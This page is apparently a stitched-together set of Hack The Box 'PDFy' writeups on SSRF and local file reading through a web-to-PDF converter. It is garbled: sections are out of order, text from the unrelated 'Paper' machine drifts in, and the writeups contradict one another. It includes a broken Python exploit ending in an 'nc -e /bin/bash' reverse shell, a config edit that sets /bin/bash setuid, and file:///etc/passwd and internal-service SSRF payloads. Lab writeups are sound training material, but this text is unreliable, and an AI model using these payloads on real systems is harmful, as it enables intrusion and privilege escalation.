Pdfy: Htb Writeup Upd

Here’s a detailed, long-form review of the resource titled “PDFy HTB Writeup UPD” (likely referring to an updated writeup for the PDFy machine on Hack The Box).

2. Vulnerability Analysis

The critical vulnerability in this scenario lies in how the PDF generator renders the input.

  • Local File Inclusion (LFI) via SSRF: Since the PDF generator acts like a browser, it can render internal resources. If the application does not sanitize the input URL, an attacker can force the generator to read local files.
    • Payload: Inputting file:///etc/passwd into the URL field often results in a PDF containing the system's passwd file.
  • Source Code Disclosure: Using the file:// protocol, attackers can read the source code of the web application (e.g., file:///var/www/html/app.py). This reveals the libraries used and potential logic flaws.

1. Reconnaissance & Enumeration

The box typically starts with a standard web server running a simple web application. The core functionality allows a user to input a URL or upload a file to generate a PDF.

  • Port Scanning: Standard nmap scans reveal ports 22 (SSH) and 80 (HTTP).
  • Web App Analysis: The site features a form where a link is submitted. The backend uses a library (often wkhtmltopdf or similar headless browser tools) to render the webpage and convert it to a PDF file for the user to download.

Tools Used

  • Nmap
  • Exiftool
  • Netcat
  • Burp Suite
  • Python one‑liners
  • SSH keygen

machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report Enumeration : Document the scan identifying ports 22, 80, and 443. Vulnerability Discovery : Note the X-Backend-Server header which reveals the office.paper hostname. Mention using to find vulnerabilities in the WordPress site. : Explain the discovery of the chat.office.paper

subdomain and the use of the "recyclops" bot to read local files (LFI). Privilege Escalation : Detail the exploit for CVE-2021-3560 (Polkit) to gain root access. InfoSec Write-ups 2. HTB "PDFy" Web Challenge

is a challenge focused on Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) via a PDF generation tool. HacktheBox Writeup: Paper - InfoSec Write-ups

PDFY: A Comprehensive Writeup on the Hack The Box (HTB) Machine

Introduction

Hack The Box (HTB) is a popular online platform that provides a virtual environment for cybersecurity enthusiasts to practice their skills and learn new techniques. The platform offers a variety of machines with different levels of difficulty, each with its unique challenges and vulnerabilities. In this writeup, we will focus on the PDFY machine, which was recently updated (UPD) on the HTB platform. Our goal is to provide a comprehensive walkthrough of the PDFY machine, covering its enumeration, exploitation, and privilege escalation.

Initial Enumeration

Upon launching the PDFY machine on HTB, we are provided with an initial IP address: 10.10.11.232. Our first step is to perform an initial enumeration of the machine using tools like Nmap. We run the following command:

nmap -sC -sV -oA initial_scan 10.10.11.232

The scan results reveal that the machine is running a web server on port 80, an SSH server on port 22, and a PDF converter service on port 8080. We also notice that the machine has a firewall configured, but it seems to be allowing incoming traffic on port 80.

Web Enumeration

Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.

Using DirBuster, we perform a directory brute-forcing attack on the web server and discover several directories, including /uploads, /download, and /admin. The /uploads directory seems to be used for storing user-uploaded files, while the /download directory appears to be used for downloading converted PDF files.

PDF Converter Service

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.

Exploitation

Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.

import socket
import os
# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the PDF converter service
s.connect(('10.10.11.232', 8080))
# Send the malicious file
s.send(malicious_file.encode())
# Receive the response
response = s.recv(1024)
# Close the socket
s.close()
# Establish a reverse shell
os.system('nc 10.10.14.12 4444 -e /bin/bash')

After executing the exploit, we gain a reverse shell as the user pdfy. We then proceed to explore the machine and gather more information about the user and its privileges.

Privilege Escalation

As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.

Next, we perform a system enumeration using tools like linpeas and systemd-analyze. The results reveal that the machine uses a SystemD service called pdfy-converter to manage the PDF converter service on port 8080.

Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json. We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.

Gaining Root Access

Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.


  "converter": 
    "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"

After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.

./bin/bash

Conclusion

In this comprehensive writeup, we have covered the PDFY machine on Hack The Box, focusing on its enumeration, exploitation, and privilege escalation. We have demonstrated how to exploit the PDF converter service to gain initial access and then escalate privileges to gain root access. The techniques used in this writeup can be applied to similar machines and scenarios, providing valuable knowledge for cybersecurity enthusiasts.

UPD (Update) Notes

This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.

Recommendations

  • Always perform thorough enumeration of the target machine.
  • Validate user-input data to prevent code execution vulnerabilities.
  • Implement proper access controls and privilege separation.
  • Regularly update and patch services to prevent exploitation.

References

  • Hack The Box: PDFY Machine
  • [1] https://www.hackthebox.eu/
  • [2] https://www.pentesting.com/

PDFy is an Easy-rated Web Challenge on Hack The Box (HTB) that centers on exploiting a Server-Side Request Forgery (SSRF) vulnerability in a web-to-PDF conversion service. The goal is to exfiltrate the contents of the /etc/passwd file from the server to retrieve the flag. Challenge Overview Difficulty: Easy Category: Web Primary Objective: Leak the /etc/passwd file. Core Vulnerability: SSRF via a PDF generation library. Walkthrough & Exploitation Steps

Initial EnumerationThe application allows users to input a URL, which it then visits and converts into a downloadable PDF document. By testing the input with a local listener or a tool like Webhook.site, you can confirm that the server makes outbound HTTP requests, indicating a potential SSRF entry point.

Identifying the SSRF ConstraintStandard attempts to load local files using protocols like file:///etc/passwd are typically blocked by the application's filters. To bypass this, you must host a malicious file on your own server (e.g., using a Python HTTP server or Serveo) that the PDFy service will visit.

Exploitation via PHP RedirectThe most common way to solve this is by using a PHP redirect. Create a .php file on your server that uses the header() function to redirect the incoming request to the target local file on the HTB server. Payload Example (exploit.php): Use code with caution. Copied to clipboard pdfy htb writeup upd

Execution: Enter the URL of your hosted exploit.php (e.g., http://your-ip:port/exploit.php) into the PDFy input field.

Retrieving the FlagWhen the PDFy server visits your URL, it follows the redirect to its own local file:///etc/passwd. The PDF generator then captures the content of that file and renders it into the PDF. Once you download and open the generated PDF, you will see the system users and the flag located within the file.

Avoid Parameters: Some versions of this challenge may fail if the redirect URL contains complex parameters; keep the exploit path as simple as possible.

Local Testing: If you are stuck, try running similar PDF conversion tools (like wkhtmltopdf) locally to see how they handle redirects.

Tooling: Using Serveo is often recommended over Ngrok for this challenge to avoid extra sign-up steps or security headers that might interfere with the conversion process.

Official PDFy Discussion - Page 2 - Challenges - Hack The Box

Note: There is no retired machine officially named "Pdfy" on Hack The Box as of early 2024. It is highly likely you are referring to the machine named "Pdf" (or PDFy in some user repositories), or potentially a mix-up with a similar challenge. However, the following review covers the typical "PDF Upload" exploitation scenario found on HTB machines like "Pdf" or similar challenges involving PDF generation.

Here is a full review and walkthrough-style analysis of a PDF-based Hack The Box machine (often identified simply as Pdf).

Step 5: Discovering Internal Service

After reading index.php, you might find a reference to:

http://127.0.0.1:8080/generate

Use SSRF to interact with this internal service:

<img src="http://127.0.0.1:8080/">

This reveals a Flask or Node.js API that generates PDFs without sanitization. The internal service is vulnerable to command injection.